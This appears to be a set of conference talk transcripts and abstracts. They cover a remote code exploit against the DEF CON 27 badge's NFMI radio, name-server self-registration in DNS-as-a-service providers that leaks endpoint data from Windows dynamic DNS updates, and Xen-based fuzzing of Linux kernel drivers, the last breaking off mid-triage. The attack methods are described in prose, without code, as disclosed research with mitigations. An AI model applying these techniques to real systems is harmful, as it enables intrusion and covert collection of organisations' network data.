has a 72 byte buffer. What I do is I basically fill up the buffer and then I drain the buffer. So now that I'm like at a known state and I fill the buffer again and read and keep on transmitting and see how that read happens and I'll actually crash the badge. So here the buffer is full. I'm going to empty the buffer. I switch over to new radio and start playing the packets as fast as I possibly can. A little faster than display can keep up with and completely fill the buffer. And the video glitches out for no reason. And then we go over here, see the packets and it crashes. A crash is neat but can we do something more interesting than that? 
Well unfortunately that padding gets added to every single packet and it's going to ruin any sort of attack that we try to send. That does something more interesting than just crash. So we need to cheat. I have found the, or took the firmware for the NFMI chip and found where it pads data and removed that. And found that BNE stuff also and removed that. We can still fake that if we want the badges to talk to each other like normal but now it's optional. I just found all that code and replaced it with no ops. But to install that code into the chip I had to figure out their crazy format first. Which was just proprietary and weird and slowed me down for a while. But once I finally got that in there I was able to do a lot more fun attacks. Here's a freshly removed badge. I switch over to GNU radio and I play my attack. It takes up four packets to fit the entire buffer overflow attack. Let's get loaded into the buffer, switch back to the badge. I tell the badge to read the packets and it executes my code. I'll end with a few oddities and mysteries that remain. Never quite understood what that initial packet that it sends out with that 0403 E045. At one point I convinced myself it was a buffer address. I don't quite remember why anymore. Sometimes when it's an error it sends a different code. I don't know what those mean. There's also a rev string and another value next to it. I was wondering is that supposed to be a frequency or something else? I was never quite sure about if it was truly a differential signal or a double differential signal. Because the preamble suggested it might be double. Never got figured out what the rest of the preamble meant. Not sure if the CRC protects it. Tried poking out a lot, didn't help. Where the heck does that mask come from? I spent a lot of while working on that trying to figure out its source. Couldn't figure that out. There's got to be an easy way to stream or send longer packets. That would be fun to play with if I could figure that out or someone else could. What is up with that convolution? Anyway, that's all. Thank you very much for watching my presentation.
|
The DEF CON 27 badge employed an obscure form of wireless communication: Near Field Magnetic Inductance (NFMI). The badges were part of a contest and while poking through the firmware for hints I noticed a buffer overflow flaw. All it required to exploit it was an oversized packet… via a chip with no datasheet and no documentation on the proprietary protocol. Thus started a 2 year odyssey. I used Software Defined Radio tools to study the signal’s modulations. I built a receiver in GNURadio and Python to convert signals into symbols, symbols obfuscated by a pattern that I had to deduce while only controlling a fraction of the bytes. Data was encoded in those symbols using proprietary convolution for even bits and Trellis Code Modulation for odd bits. I then reversed their bizarre CRC and wrote tools to craft and send packets. Using those tools I chained bugs in 2 chips and remotely crashed the badge. However, limitations in the NFMI protocol made more sophisticated attacks impossible. But after a year and a half invested, I was not about to give up. I soldered leads to middle layer traces, extracted and reverse engineered the NFMI firmware, fixed their protocol, and patched a badge FW to patch the NFMI FW. At long last I achieved what may be the world’s first, over-the-air, remote code exploit via NFMI.
|
10.5446/54237 (DOI)
|
Hello. That come today would present to you our research on the DNS vulnerability class in the DNS service providers. My name is here and I lead the research team at with the cloud security company. This mean the room is I'm in Ludwak. Hi, the city of. Thank you, share and it's really great to be here. And so let's start a bit of background about us. So we are the research team. We use the cloud security company. The team is a composed of experienced security researchers. Many of them with background from Microsoft cloud security group. And our goal is to do groundbreaking cloud research to find vulnerabilities, misconfigurations, risks in cloud environments that customers are not aware of and would impact anyone using the cloud. So we started looking into the NSS service. Why the NSS service. So first of all, DNS, as we all know, is the lifeblood of the Internet. It's probably one of the most important services that we have. Now, the NSS service has huge impact. If you think about it, it holds your domain. It holds your internal routing. Now what's cool about the NSS service, unlike usual cloud services is that also it controls not only cloud activities, right? When you use the NSS service, it also impacts your own premise activities. So potentially the NSS service has huge impact on an organization. Now on top of that, what is really great for researchers is the DNS protocol is one of the oldest protocols that we use. It's more than 20 years old. It's incredibly complex. And there's so many different implementations of it, both from the DNS providers, but also think about millions of DNS clients that we have out there, each of them implemented in a different way, creating a very, very interesting attack vector for researchers to explore. So we started from looking into Route 53, which is the DNS service provided by AWS, and it's a highly popular across AWS customers. So Route 53 is built on thousands of DNS servers that host DNS zones for all AWS customers. We mapped around 2000 servers in the Route 53 platform. Whenever a customer is hosting a domain on the platform, they get four shared name servers to manage the desired domain. On the right side of the slide, you can see a simulation of one out of the four DNS servers Amazon provides each domain. The server stores the DNS zones for with IO, for example, and several other AWS customers. If the server is queried for one of the domains under management, it will return the appropriate records for that domain. While studying the Route 53, we discovered that anyone can register any domain they want on the platform. There is no restriction on whether the domain is already hosted on the platform, and there is no ownership verification. The only limitation is that if the domain already exists in one of the name servers, it will not be possible to register it again on the same server. And it makes a lot of sense, and it's indeed not possible, trust us, we tried. Basically, anyone can register any domain on any of the name servers as long as it does not already exist there. But is there anything dangerous here? For me, as a security researcher, it felt like we had too much control here. But almost any DNS service provider works this way. So is it really a security problem? And this is an example that if you try to register with again on the server, it will be impossible because it's already there. So we started with a very, very simple and interesting research question. 
If we can register any domain, what domain can we possibly register that will give us interesting access to data? So we want to register a domain that is not already present on the name server, and that for some reason DNS clients will actually query for that. So we started into a quest to think what domains can register that no one thought about, and we could actually somehow break the DNS. So we thought about it and came up with an idea. What would happen if we register one of the official AWS name servers on the platform? What would happen if we register one of the Route 53 name servers under the same server? So we choose an arbitrary name server. In this case, it's the NS 1611, as you see on the slide, and we try to register it on the platform enough times. So at least once it would fall under the management of the same name server. Let's do an illustration of that. So as you can see the slide, we have an illustration of the NS 1611 name server, which is an official Route 53 name server. And you can see it already contains the NS zones for several of Route 53 customers. What do you think would happen if you manage to register the name server domain name NS 1611 under its own management? I totally don't know what would happen, but we must check it out. Definitely. So we tried it and it worked. As you can see on the slide, our new domain is now managed within a name server with the same domain name. We were really excited. We didn't know if it will have any impact, but we had a really good feeling about this one. So to test the effect of what we did, we decided to specify an IP record pointing to our server. So now, if a DNS client will connect to the NS 1611 name server and ask it about itself, it is our IP address that will be returned. At this point, we were really curious to know if anyone is asking Amazon's server about itself and if anyone is trying to connect with us because of the manipulation we did. So we ran TCP dump on our server and hope to see something interesting. Surprisingly, we started receiving thousands of requests from thousands of different IPs. We realized we were onto something. The next step in the research was to analyze all these DNS queries and figure out why these queries are being sent to us. So wait, why are we getting any traffic? No one was supposed to ask the name server for their own domain. The name server actual domain is registered on other name servers. So why are we getting any traffic? And what's more weird was that it wasn't actual regular traffic. It wasn't even DNS traffic. It was dynamic DNS traffic, which is a very specific protocol that you wouldn't even expect to see in this type of internet traffic. Now we were getting a lot of data and talking about IP addresses, computer names, domain names. So we started investigating. We started to look into the data. So basically we saw we were getting millions of actual requests from endpoints. And when we started looking into it, we saw it's a lot of data we are seeing internal IPs, external IPs, names of computers. We very quickly understood these are names of endpoints within many, many different organizations across the globe. And the scale was truly unbelievable. It's within a few hours of sniffing the traffic. We saw more than a million unique endpoints. And they would belong to based on the initial analysis we did. We saw more than 50,000 organizations, 15,000 organizations, all of them using AWS as a DNS service. 
Now we said, okay, let's try to figure out what organizations are we seeing here, right? So it was quickly we understood that we are stepping into an unbelievable tap of worldwide organization and traffic. We saw Fortune 500 companies, we saw more than 130 government agencies, right, in the traffic. So we knew we were probably onto something big, but the problem is that we had no clue what we are seeing and why. So what do we know so far? We registered a name server domain on the name server, right? We have no idea why, but for some reason, millions of endpoints started sending tons of dynamic queries to us. But again, why? Why are we seeing dynamic DNS before we are able to answer that simple, mysterious question? We have no way to actually understand what we're seeing. So we decided we are going to step into the world of dynamic DNS. So what is exactly dynamic DNS? Dynamic DNS is an extension to the DNS protocol, which is specified in RFC 2136. It allows clients to dynamically update DNS records of a target DNS server. And it's commonly used to help devices find each other in internal Windows networks. Let's see how it works. So when my Windows computer joined the company's network and received a new IP address, as you see on the slide, it updates the local DNS server, which is called master server when it's new IP address. Now, when Ami is trying to connect to my computer, he can query the local DNS server about share PC. And the master server will answer it with my current IP address. So far, sounds like a great feature. At the moment, it is still not clear to us why endpoints sends dynamic DNS updates to our server. These are requests that should never leave the internal network. Could it be that the endpoints think of our server as their master server? How does they even know how to find their master server? So it turns out Microsoft has its own algorithm for finding the master server. And it does not work exactly as specified in the RFC. Just before we go into the logic of the algorithm, let's do a brief refresh on DNS records for those who have not touched DNS recently. So in order to fully understand the algorithm, it is important to remember only three types of records. It will make it very quick. The first would be the A record. A record specify the IP address of which the domain points to. The second would be the NS record, which specify the name server of the domain name. The third is the SOA record, which is short for start of authority. The SOA records contain administrative information about the domain and its first parameter is the master server. This is the server in which clients will attempt to update during dynamic DNS updates. Usually this server will be on one of the domain's name servers. And in the last 50 screen, the different value of this field will be the first Amazon's name server from the name server's list. And now that we have already freshed our memory, let's get into the algorithm. This is the primary name server. So when a Windows endpoint want to update the internal master server for its new IP address, it first needs to find it. The endpoint will send the SOA query for the internal DNS resolver on its own fully qualified domain name. The internal DNS resolver knows that the WISIO DNS zone is managed internally. So with queried, it will return the internal master server within the SOA response. Now, when the endpoints found the master server, it will update it as we saw in the previous illustration. And the update succeed. 
But what happens if the corporate DNS resolver is not set correctly and does not contain a DNS zone for the local domain? Or what would happen when the computer leaves the organization and start working with external DNS resolvers provided by home routers? In that cases, when the computer query for the corporate domain, the DNS resolver will treat it as an external domain and will return the master server of the external domain just as it will do with any other domain. This is where the problem starts. So imagine an employee of WIS decided to work from home, like most of us lately, and connected to their home Wi-Fi. The computer got an internal IP address from the home router and now trying to find the local master server to update it. Because the external DNS resolver are not familiar with WISIO, it is going to resolve it just like any other domain. Because the domain is managed on Route 53, it will return the WISIO master server as specified in Route 53. The endpoint will then try to update the master server, which is an Amazon shared name server that manages thousands of customers. Obviously, Amazon servers does not support dynamic DNS, so the update request will fail. The thing is that the Microsoft's algorithm does not give up here. The algorithm believes it still has a chance to find the master server. So the next step would be to check if the WISIO's name servers have records for the master server. So the DNS client connects directly to the IP address of the name server and asks them, what is the IP address of the master server? In our case, it is the same domain name as the name server. And here happens the interesting part. In fact, Windows DNS clients queries the name server for itself. And if you remember, we have registered this DNS on and here we can return any record we want. So we returned our IP address to the DNS client and now the computer will update our server with DNS updates, which is the malicious actor server. And this is very crazy. So now we reached the point that we started understanding what's happening, right? Because what we know, we know the Windows endpoints, they use a custom algorithm to find the master DNS. The algorithm queries the name server for its own address. And when you are in external and using Route 53, what happens that this means that you're actually querying the name server for its own domain. And that explains what happens. That's why we are able to register our malicious DNS server and we're receiving this dynamic DNS traffic for millions of endpoints. Because all of the organizations using Route 53 when these devices are actually outside of the domain and outside of the company, they will actually use this algorithm and we will be able to get traffic from those devices. So we understood what's going on. The next step was to figure out how much data are we actually getting and what can you find from it. So when we started looking into the data, we quickly understood that we are actually building here what we call the nation state intelligence capability. Because think about it. We saw IPs for millions of endpoints from more than 15,000 organizations, but it's not just DNS requests. We are seeing external IPs, internal IPs, computer names. We are starting to map all of those organizations. So let's see what we can do with this scale of intelligence capabilities. So we started from what we call IP based intelligence. 
Imagine that you can map companies and a portion of companies around the world and map their global sites, map where their employees are at. So we looked at one company, for example, and just see how amazing this is. So this is one of the largest services companies in the world. And we got around 40K endpoints actively reporting from this company. Now, we are seeing a mapping of all of their global sites, all of their actual offices, the employee locations. So from just the external IPs, we can map, create a map of offices and home locations of employees across all of those companies. It's really amazing. And we can go even deeper. Like this is an example of a specific office where we detected 600 endpoints of that company, right? So imagine an intelligence capability that maps for you in one single tap into the DNS without any trace, actual structures of organizations across the world and all of their different offices and locations. So, but it doesn't stop there. Then we started thinking, okay, what interesting data can we pull from this if we're an intelligence agency now? So we started looking at companies that are in violation of the Office of Foreign Assets Control. We saw interesting things. For example, this mining company, it's an international mining company. And interestingly, we found six employees working from the Ivory Coast, which is definitely a place that is not allowed in that regulation at all. Right? And we saw so many interesting examples like that. So we found a subsidiary of a large credit union with a branch in Iran. Again, 13 endpoints working from Iran based on our new and newly revised intelligence capability. Right? So it's not only mapping all organizations, we can now start finding violations. We can ask questions across so many different agencies. You remember we are actually seeing also government agencies. I wonder where are all of their offices, right? Now, it doesn't stop there because if you remember external IPs is just a small portion of the data. Right? We also have internal IPs. So what can you do with internal IPs? If I have internal IPs from different endpoints from the company, I can start building the map of the network, the internal logical network of the company. So for example, these are the segments. This is the employee segment. This is the ICD. Here's the operation network. Remember that we also see names of devices so we can start really understanding all of the segments. So building an intelligence map of the organization externally and internally across thousands of organizations. Now, we also had computer names and the computer names actually hold information about the endpoint. Right? And many times you get employee names. You understand that the actual role of the machine. You can see the specific, the build the machines is using. Right? So we are actually getting quite a lot of information about those companies based on the IPs, the computer names. Here you see this is finance and we see all of those machines are part of the specific segment. Okay, perfect. I'm starting to build my internal map of this company. That's perfect. Now, just so we understand the scope here, we looked at the specific DNS provider. Then we asked, wait, is this only this DNS provider? So we started looking at others and we soon found there's many others also susceptible to the same vulnerabilities. Right? This is not just the ROD 53 vulnerability. This seems to be something that is shared across most of the DNS service providers. 
And if you think about it, we don't have to stop at the cloud providers. You have shared hosting. You have the main registrar. There is so many different service providers using, again, I think the shared concept here is that they provide DNS services for many, many different companies. And there is a chance that many, many of them are vulnerable to this attack of name server hijacking. So, we started from AWS. We reported the vulnerability and was fixed really, really quickly with the, by the AWS ROD 53 team. And again, I think within a week or two, it was fixed and no one can now utilize this vulnerability in ROD 53 because you're not allowed anymore to register those special domains in the name server. And we are in disclosure process with several additional cloud providers and we believe there is many, many more to come. And it's part also of what we call the industry to start looking into and actually check across all of the DNS providers. So, as I just said, AWS fixed the vulnerability very easily and they added all the names of their name servers to an ignore list, which is simple and very effective. Users trying to register one of the official AWS name servers on the ROD 53 platform and now receiving the follow error message, which says that the domain is invalid and you can see it on the slide. And when we report our discovery to Microsoft, they explained to us that this is a known mis-configuration that occur when the organization works with external DNS resolvers. And it's not considered as a vulnerability. So, we would like to offer a solution for both platforms and organizations, we would like to protect themselves from this kind of attacks. First, we will start with the platforms. DNS providers want to ensure they are not vulnerable, should make sure it is impossible to register their own domains on the platform. DNS providers want to have even a better security, can also do ownership verification to ensure users are only registered their own domains. And in addition, it is very important to make sure that the platform user cannot register a reserved name as specified in the DNSRFC. The RFC is full of reserved domains that should not be allowed to register and their gestation may lead to unexpected behavior. For an organization that want to make sure they are not vulnerable, we recommend making sure that the primary name server in their SOA record does not point to a different domain owned by the DNS provider. As you can see in the slide, and now you can see it, the different primary name server that a domain owner receives when they enter domains to the RFC 3 is the first of the four name servers which manage the DNS zone. Changing it to changing the primary name server to an invalid subdomain of the organization, or even the real primary master server will fix the issue. And attackers will not allow potential attackers to register a domain on the platform. As you can see in the slide, and yeah, we are very close to the end. So just a few summaries and takeaways. First of all, what's really cool here is that we are able to get to nation state intelligence capabilities from a simple domain registration. Just a simple domain registration got us so much power. And we believe what we saw here is a new class of the DNS vulnerabilities. This is just one idea of a domain. Think about how many different interesting domains you can try to register. And remember today you can basically write the register any domain that you want that will trigger unexpected results. 
No one thought and we honestly did understand initially what would be the impact of registering the name server on itself. I'm sure there's many other magic domains that you can register. And it opens up so many interesting questions like all of this traffic was dynamic DNS. What was it was? Why is it actually the DNS was built as a protocol like 20 years ago for unfairness networks. Why are we still seeing it outside in the Internet? What are the implications of this protocol still being active on the Internet and potentially endangering both the endpoints and the DNS servers, right? So this is so much here that we see as potential research areas for us and also for the community. And we believe the scope here is huge because it's not a single service we found it across multiple DNS providers and we are pretty sure that this one will be in many others. We probably impact many, many, many of those DNS providers. Thank you very much, guys.
|
We present a novel class of DNS vulnerabilities that affects multiple DNS-as-a-Service (DNSaaS) providers. The vulnerabilities have been proven and successfully exploited on three major cloud providers including AWS Route 53 and may affect many others. Successful exploitation of the vulnerabilities may allow exfiltration of sensitive information from service customers' corporate networks. The leaked information contains internal and external IP addresses, computer names, and sometimes NTLM hashes. The number of organizations vulnerable to this weakness is shocking. Over a few hours of DNS sniffing, we received sensitive information carried by DNS update queries from ~1M Windows endpoints from around 15,000 potentially vulnerable companies, including 15 Fortune 500 companies. In some organizations, there were more than 20,000 endpoints that actively leaked their information out of the organization. We will review possible mitigations to this problem and solutions for both DNSaaS providers and managed networks. REFERENCES: I. Microsoft Windows DNS Update algorithm explained - https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003 II. An excellent blog post by Matthew Bryant on hijacking DNS Updates abusing a dangling domain issue on Guatemala State's Top Level Domain - https://thehackerblog.com/hacking-guatemalas-dns-spying-on-active-directory-users-by-exploiting-a-tld-misconfiguration/
|
10.5446/54240 (DOI)
|
Hi everyone, thank you for joining my talk, Fuzzing Linux with Zen. My name is Tom Ashlandiel and I'm a Senior Security Researcher at Intel and I also maintain a variety of open source tools such as the Zen Hypervisor, LibVMI, DropWoof and I also participate in the HoneyNet project where we usually run Google Summer Code projects during the summer developing open source tools to fight against malware. What this talk is about is that we had this task of fuzzing the device-facing input points of several Linux kernel modules, kernel drivers, and we had to build new tools to get it done. We open-sourced them, we found a bunch of bugs and fixed them, I will talk about those, but really the point of this talk is to show you how we did it so you can go out and do it yourself. To start, let's talk a little bit about feedback fuzzers. They are not just about feeding random input to your target, they use feedback as a mechanism to better exercise your target code and they do it by effectively collecting the execution log or called the coverage when you are running the fuzzer and you can use that to compare execution from run to run to determine if the fuzzer was able to discover some new code that hasn't been seen before. The idea is simply that if you discovered some new code region that hasn't been exercised before, it's worthwhile to focus on that because the chances of finding some new bugs is higher on code that hasn't been exercised as much. Obviously, what feedback fuzzers need the most is determinism. If the target code behaves radically differently from one run to the other, then the fuzzer might just get stuck in focusing on inputs that don't actually lead anywhere because it will think that it's opening up new code paths when it's in fact just noise. So if you have garbage in, you will have garbage out. So Zen VM forking is supposed to address that shortcoming. It is effectively a way to add determinism to kernel code execution. If you think about the kernel, it's pretty undeterministic. You have interrupts firing all the time, you have multiple threads and scheduling. It's as far away from deterministic execution as you can get. So VM forking allows you to split the runtime of a VM into multiple VMs and populate the memory of these fork VMs from the parent one. So to make this as fast as possible, you effectively can just, when the fork is executing a memory access where it's a read or an execution, you can just populate those page table entries in the fork with a shared page table entry and you only have to actually deduplicate the entire page of memory if the fork is writing something into memory. To get even better speed, once you have a fork VM set up, you can actually just reset the state of that fork VM, just copy the VCP registers from the parent and throw away any of the deduplicated copied pages, but keep the shared pages in place that will get you the best performance. If you take a look at numbers, if you run these operations in a tight loop, you can create about 1300 VMs per second. If you are doing a reset, that's about 9000 resets per second. So these numbers are fairly okay for fuzzing. Obviously, you will not see these numbers because these are the theoretical max if you are doing nothing just resetting the VM. Obviously, between those resets, you actually want to run your target code. A couple other building blocks to mention here to really understand what we will be doing is most importantly, Zens introspection subsystem. 
So this is what I've been working on for the last 10 years. It allows you to really peek into the runtime execution state of a guest. You can read and write the memory, translate virtual addresses, but it also allows you to pause the vCPU of the VM at various hardware events and get a notification of those hardware events in your regular user-space application in dom0, which makes development of introspection tools really quite convenient. You can get notifications of CPUIDs, breakpoints, single-stepping, EPT faults, and a bunch of other things. The other really cool feature that just got upstreamed into Xen is called VM trace. We did this in collaboration with the Polish CERT and Citrix, and this is an effective way of turning on Intel Processor Trace to record the execution of a full VM from dom0, where the CPU itself will store enough information about the execution of the VM, with low overhead, so that later on that log can be decoded to reconstruct the execution of that VM and see what happened. And obviously, this is what we will be using to collect the coverage information. So if we look at the full flow of how the fuzzing setup works on Xen: you start from the parent VM, you boot up your regular VM, and then the target code is reached. You compile the target code with the magic CPUID in place that will signal to the fuzzer that this is the point where you want to start fuzzing. The fuzzer will find that CPUID when it's executed and will create a fork, which we call the sink VM. In that sink VM, we look up the virtual address of various kernel functions that usually get called when something bad is about to happen in the kernel, such as a panic happening, or KASAN or UBSAN, the built-in error detection systems in the Linux kernel, tripping. We add a breakpoint to the entry of all of those functions, and we create another fork. This is what we call the fuzz VM. This is where we will actually be performing the fuzzing. This works effectively by taking the input that's generated by the fuzzer (in this case we are using AFL, the American Fuzzy Lop), writing it straight into the VM's memory, unpausing it, and seeing what happens. If we catch a breakpoint, that's going to be at one of those entry addresses that we breakpointed earlier. Great, we just found a crash that we report back to AFL. If we catch the magic CPUID again, that would be the end harness. So you have a start harness and an end harness. If you hit the end harness, then nothing bad happened. If neither, then we report a timeout. Afterwards, we can take a look at the Intel Processor Trace log, decode it, and we use that to report the coverage back to AFL so that it will understand if something new happened while fuzzing that VM. And then we just reset the state and go to the next input from AFL. Let's take a look at a demo of how this actually looks in practice. I am creating an Ubuntu 20.04 VM and I will be booting a Linux 5.10 kernel that has the harness already compiled into it. I'm booting with KASLR and PTI disabled just to make debugging easier later on. And what we will be fuzzing is a USB driver in that kernel. I effectively have a USB thumb drive attached to a USB 3 hub. And I fire up the KFX fuzzer to listen for when that magic CPUID, which here is called magic mark, is executed. So now it's just listening to see when that CPUID happens.
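To make that flow easier to keep in mind, here is a rough sketch of a single fuzzing iteration in Python-style pseudocode. All of the helper names on the fork object are hypothetical stand-ins for the real Xen/libvmi plumbing used by KFX, so treat this purely as a mental model of the loop just described, not as the actual tool code.

# Conceptual sketch of one fuzzing iteration as described above. The fork object
# and its methods are hypothetical stand-ins for the real Xen/libvmi plumbing in
# KFX; this is a mental model of the loop, not the actual tool code.
CRASH, FINISHED, TIMEOUT = "crash", "finished", "timeout"

def run_one_input(parent_vm, afl_input, crash_handler_addrs, timeout_s=1.0):
    fork = parent_vm.fork()                    # copy-on-write VM fork
    for addr in crash_handler_addrs:           # panic / KASAN / UBSAN entry points
        fork.set_breakpoint(addr)
    fork.write_memory(fork.target_buf, afl_input[:fork.target_size])
    fork.start_pt_recording()                  # Intel Processor Trace via VM trace
    event = fork.resume_until_event(timeout_s)

    if event.is_breakpoint:                    # landed in an error handler: crash
        outcome = CRASH
    elif event.is_magic_cpuid:                 # reached the end harness: clean run
        outcome = FINISHED
    else:
        outcome = TIMEOUT

    coverage = fork.decode_pt_log()            # new edges get reported back to AFL
    fork.reset_to_parent()                     # cheap reset, shared pages stay
    return outcome, coverage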
The VM finished booting, I will log in, and we'll initiate some interaction with that USB thumb drive that will trigger the harness I have pre-compiled in there. So I ran fdisk and you see that fdisk never returned, it never finished. And that is because that VM is now paused, because KFX caught that CPUID. And we have the information about where the target buffer and the target size are that we want to fuzz. We can go to that virtual address and read out that memory to be used as the seed for the fuzzer. So this is what the kernel was just about to process while executing fdisk, and we will start mutating from that structure to see what can happen if that input is malformed or malicious. We will be using AFL++ here; the fuzzer is up and running. We are opening up a bunch of paths, as you can see. And in less than a minute, there is already a crash found. We will go into the details of what this crash is about, but this is actually a real bug in the Linux kernel that was discovered just like that. So at this point you are probably wondering, okay, what the hell did we just fuzz and what is the bug, and you are right. There is more to fuzzing than just running the fuzzer. In this engagement we discovered that really the biggest pain point is not running the fuzzer. Once the fuzzer is up and running, it is great. You can go and take a walk, grab a coffee, it is awesome. You don't really have much to do, it is all automated. The real pain point is performing the analysis, figuring out what to fuzz in the first place, and then, once the fuzzer finds something, getting enough information out about the crash so that you can create a report or fix the bug. So how do we do all of those steps? Let's start with analysis. What we were fuzzing there is DMA. DMA is memory that the kernel makes accessible to an external device, and this is to facilitate fast I/O operations: direct access to memory gives you better speed. The way this works is that the device has direct access to that memory so that it doesn't have to go through the CPU and the MMU to actually read or write to that memory. There is what's called the IOMMU, but the IOMMU only restricts access to other pages: pages that are explicitly made accessible by the kernel to the device are allowed to be accessed by the device through the IOMMU. So the IOMMU is not going to protect you against a malicious device that is placing random stuff on a DMA page that it's allowed to access. So we figured, okay, let's take a look at the Linux source code and see where DMA memory is getting accessed. It should not be too bad, right? Like with a system call: what the kernel does when it receives some buffer from user space is that the first thing it does is copy it into kernel memory and do its processing there. So we figured, well, that's how DMA works as well: the kernel should copy the DMA memory first to an internal buffer and go from there. But boy, were we wrong. It turns out that the kernel is accessing DMA memory all over the place. There is no single copy-from-DMA function. Once DMA memory is established, the kernel can access it and does access it all over the place. So even just figuring out where Linux reads from DMA is not trivial. So what we did was we looked through the source code looking for hints of where the kernel might be doing a DMA read. And it's quite painful, because just by looking at the source code, you don't necessarily know whether some pointer is DMA memory or not.
So what we did: we looked for the IOMMU cookie, or the best one was actually to look at the endianness conversion functions, the ones that convert big-endian or little-endian values to CPU order. That is a pretty clear indication that the data being read might not be in the endianness that the CPU expects, which usually means that there was some cross-communication with an external device. Then we take the output from ftrace, which is a built-in subsystem in Linux that allows you to trace the execution of the kernel internally, cross-reference what we found that we think is DMA access, and see whether those functions actually get called during execution of the kernel. Because we found a bunch of these accesses, but some were in functions that never actually executed during runtime, and those are not really good targets to fuzz, because if you can't get the code to execute, then you can't fuzz it. So this was not great. So we also decided to just be old school and dig through the spec; maybe we get a better understanding of what's going on here, because the kernel code is not the easiest thing to read. Looking at the spec itself, we can find pictures like this that are immensely helpful to try to understand what the hell is going on. Obviously, this subsystem, as you can see, is quite complex. But really, the biggest boost that we got for our engagement here was to just discover the names of the rings that this subsystem uses for device-to-kernel communication. And these are the event ring, the transfer rings and the command ring. So just knowing those names, we were able to just grep for whether there is a variable called event ring and see where that is being accessed. What we found is this location where, yeah, there is what's called the event ring. And this is a function that gets called from the interrupt handler. What happens is that the device, or the USB hub, places some data on this ring and sends an interrupt, and then the kernel goes and processes whatever structure the device sent. It dequeues that from the ring page, which is DMA-accessible. So what we just fuzzed, what the harness setup was, is: just after that structure is dequeued from the DMA page, we have the harness start, which transfers the information about where the pointer is and what the size of the structure is. And then we have a couple of points where we want to stop the fuzzer and go to the next iteration. Effectively, whenever this function would return, we want to stop the fuzzer. We want to fuzz everything that's in this function and whatever this function calls. As for what those harness functions actually look like, they are really just the CPUID instruction, where we stuff the magic information into registers that the user-space tool in dom0 can receive. You can effectively think of them as hypercalls. All right. So once we found that bug, what's the next step? VM forks are a little special on Xen in that they are not fully functional VMs. You can turn them into fully functional VMs, but for fuzzing there's obviously no point. But because of that, there's a little bit of pain in actually figuring out what happened in them, because you don't get to just log in and gather the logs: there's no network, there's no disk, no console, there's no I/O into VM forks. They are literally just running with CPU and memory.
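As a side note on that source-scanning step: the "look for endianness conversions, then cross-reference with ftrace" heuristic can be scripted. The sketch below is only an illustration of the idea; the regexes are deliberately crude, and the ftrace line format it assumes (the default function tracer output) is an assumption, not part of the real tooling.

#!/usr/bin/env python3
# Crude heuristic: flag driver functions that call *_to_cpu() endianness
# converters (a hint the data may come from a device), then keep only the ones
# that actually showed up in an ftrace function-trace log.
import re, sys, pathlib

CONVERTERS = re.compile(r"\b(le|be)(16|32|64)_to_cpu\b")
FUNC_DEF   = re.compile(r"^\s*(?:static\s+)?\w[\w\s\*]*?\b(\w+)\s*\(")
TRACE_LINE = re.compile(r":\s+([\w.]+)\s+<-")   # "timestamp: func <-caller" (assumed format)

def candidate_functions(source_dir):
    """Map function name -> file for functions whose body calls *_to_cpu()."""
    hits, current = {}, None
    for path in pathlib.Path(source_dir).rglob("*.c"):
        for line in path.read_text(errors="ignore").splitlines():
            m = FUNC_DEF.match(line)
            if m:
                current = m.group(1)            # remember the last definition-like line
            if current and CONVERTERS.search(line):
                hits[current] = str(path)
    return hits

def traced_functions(ftrace_log):
    """Function names that actually executed, taken from an ftrace dump."""
    names = set()
    for line in open(ftrace_log, errors="ignore"):
        m = TRACE_LINE.search(line)
        if m:
            names.add(m.group(1))
    return names

if __name__ == "__main__":
    cand = candidate_functions(sys.argv[1])     # e.g. drivers/usb/host/
    live = traced_functions(sys.argv[2])        # ftrace output captured at runtime
    for fn in sorted(set(cand) & live):
        print(f"{fn:40s} {cand[fn]}")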
But fortunately, the dmesg buffer that the Linux kernel uses to store information about runtime events and errors and whatnot is just sitting in RAM, so we can go and carve it out. The way we do that is we're going to use gdbsx, which has been shipping with Xen for over a decade at this point, and it's really just a minimal GDB bridge. If you build the kernel with debug information and frame pointers, you can access the kernel state using just GDB. So let's take a look at how this works. This is where we were: we just found the bug, we want to figure out what happened, what the bug is. So we'll take KFX and re-execute, but instead of taking the input from AFL, we'll just use that file that was found by AFL, inject it into a VM fork and see what happened with the debug output. We see that, okay, ubsan_prologue tripped. ubsan_prologue is the function that gets called when the kernel starts to construct the UBSAN report. So we want to stop the VM fork after it has actually finished printing the UBSAN report into the dmesg buffer, so we will stop at ubsan_epilogue. And at that point, we can really just attach the debugger to it and read out the dmesg buffer. So I fire up gdbsx, attach it to the domain, go into the source folder where I compiled that kernel, load up the symbol file for the kernel, attach to that bridge, and print the dmesg buffer using lx-dmesg. And there we go. Right at the bottom of the dmesg buffer, we see the report that UBSAN generated for the bug that the fuzzer just found. This is an array-index-out-of-bounds error in xhci-ring. Awesome. So this is pretty much how you triage the errors that you find using the fuzzer. For most of the cases, this has been perfectly sufficient, right? We have the source line that we have to take a look at. Usually it's pretty straightforward where the bug is coming from, but not all the time. Sometimes the bug triggers in code that's far away from the driver that we are actually fuzzing: there is some call chain from the start point that we are fuzzing from that reaches some deep layer of the kernel, and that's where the bug happens, and figuring out what's going on there is a little bit more difficult. So let's look at triaging beyond the basics. Here is the harness that we used to fuzz the igb network driver. This is a network driver that receives packets. Here we have the interrupt handler for when a packet is received by the kernel. The kernel goes and reads this Rx descriptor buffer that the device places on the ring, which has information about the size of the packet that was just received. So this is not the packet itself; this is metadata about the packet that the device itself constructs. And we want to fuzz that. So what we do is we jump in just after that Rx descriptor buffer was received from the ring, we start fuzzing there, and we want to stop fuzzing when the loop loops around. We also have a harness stop when that loop breaks out; that's not shown here. So using this harness, we found the following bug. We get a KASAN null-pointer dereference in a function called gro_pull_from_frag0. We also get a helpful stack call trace where we see that there is kasan_report and just before that there is a memcpy. So gro_pull_from_frag0 calls memcpy. All right, let's take a look at that function. It turns out that this is not in igb itself; this is in net/core/dev.c.
